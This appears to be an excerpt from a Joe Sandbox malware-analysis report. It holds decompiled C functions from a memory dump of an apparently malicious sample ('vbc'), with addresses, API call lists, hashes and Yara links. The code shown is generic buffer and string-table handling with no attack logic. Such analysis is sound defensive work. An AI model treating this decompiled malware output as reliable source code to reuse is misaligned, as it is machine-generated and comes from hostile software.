                                                                                                                                                                        • API String ID: 3110682361-0
                                                                                                                                                                        • Opcode ID: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                                                                                                                                                                        • Instruction ID: a7b320da169f7f969887caa54c031871a44602910a4795043d90d4c59a740d9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a01b5491f9ecde230b25e47fc41df6e3a48aedd09d870957f2f4d0e5019b56d
                                                                                                                                                                        • Instruction Fuzzy Hash: B0312972D0011D9BDB10DB68CC81BDEBBB8EF45318F1006B6E545B3281DA79AE858B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408638 Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E00408638(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x414350;
				_t22 = E00406578(0x1c8, __esi);
				_push(0x14);
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                                                                                                                        0x00408638
                                                                                                                                                                        0x00408640
                                                                                                                                                                        0x00408646
                                                                                                                                                                        0x0040864b
                                                                                                                                                                        0x0040864d
                                                                                                                                                                        0x0040865d
                                                                                                                                                                        0x0040866f
                                                                                                                                                                        0x0040865f
                                                                                                                                                                        0x0040865f
                                                                                                                                                                        0x00408662
                                                                                                                                                                        0x00408664
                                                                                                                                                                        0x00408667
                                                                                                                                                                        0x0040866a
                                                                                                                                                                        0x0040866a
                                                                                                                                                                        0x00408671
                                                                                                                                                                        0x00408673
                                                                                                                                                                        0x00408676
                                                                                                                                                                        0x0040867e
                                                                                                                                                                        0x00408690
                                                                                                                                                                        0x00408680
                                                                                                                                                                        0x00408680
                                                                                                                                                                        0x00408683
                                                                                                                                                                        0x00408685
                                                                                                                                                                        0x00408688
                                                                                                                                                                        0x0040868b
                                                                                                                                                                        0x0040868b
                                                                                                                                                                        0x00408692
                                                                                                                                                                        0x00408694
                                                                                                                                                                        0x00408697
                                                                                                                                                                        0x0040869f
                                                                                                                                                                        0x004086b1
                                                                                                                                                                        0x004086a1
                                                                                                                                                                        0x004086a1
                                                                                                                                                                        0x004086a4
                                                                                                                                                                        0x004086a6
                                                                                                                                                                        0x004086a9
                                                                                                                                                                        0x004086ac
                                                                                                                                                                        0x004086ac
                                                                                                                                                                        0x004086b3
                                                                                                                                                                        0x004086b5
                                                                                                                                                                        0x004086b8
                                                                                                                                                                        0x004086c0
                                                                                                                                                                        0x004086d2
                                                                                                                                                                        0x004086c2
                                                                                                                                                                        0x004086c2
                                                                                                                                                                        0x004086c5
                                                                                                                                                                        0x004086c7
                                                                                                                                                                        0x004086ca
                                                                                                                                                                        0x004086cd
                                                                                                                                                                        0x004086cd
                                                                                                                                                                        0x004086d5
                                                                                                                                                                        0x004086db

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1860491036-0
                                                                                                                                                                        • Opcode ID: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
                                                                                                                                                                        • Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
                                                                                                                                                                        • Opcode Fuzzy Hash: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
                                                                                                                                                                        • Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406AA3 Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406AA3(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406104(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E00406104(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                                                                                                                        0x00406aad
                                                                                                                                                                        0x00406aaf
                                                                                                                                                                        0x00406ab4
                                                                                                                                                                        0x00406ab7
                                                                                                                                                                        0x00406abe
                                                                                                                                                                        0x00406ac1
                                                                                                                                                                        0x00406ac5
                                                                                                                                                                        0x00406ac8
                                                                                                                                                                        0x00406acb
                                                                                                                                                                        0x00406adb
                                                                                                                                                                        0x00406acd
                                                                                                                                                                        0x00406acf
                                                                                                                                                                        0x00406acf
                                                                                                                                                                        0x00406ae1
                                                                                                                                                                        0x00406ae7
                                                                                                                                                                        0x00406aeb
                                                                                                                                                                        0x00406aee
                                                                                                                                                                        0x00406aff
                                                                                                                                                                        0x00406af0
                                                                                                                                                                        0x00406af2
                                                                                                                                                                        0x00406af2
                                                                                                                                                                        0x00406b12
                                                                                                                                                                        0x00406b1f
                                                                                                                                                                        0x00406b2b
                                                                                                                                                                        0x00406b2e
                                                                                                                                                                        0x00406b35
                                                                                                                                                                        0x00406b3b

                                                                                                                                                                        APIs
                                                                                                                                                                        • strlen.MSVCRT ref: 00406AAF
                                                                                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
                                                                                                                                                                          • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
                                                                                                                                                                          • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
                                                                                                                                                                          • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,73B74DE0,00406B78,00000001,?,00000000,73B74DE0,00406EF2,00000000,?,?), ref: 00406141
                                                                                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
                                                                                                                                                                        • memcpy.MSVCRT ref: 00406B12
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3669619086-0
                                                                                                                                                                        • Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                                                                                                                                                                        • Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
                                                                                                                                                                        • Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                                                                                                                                                                        • Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%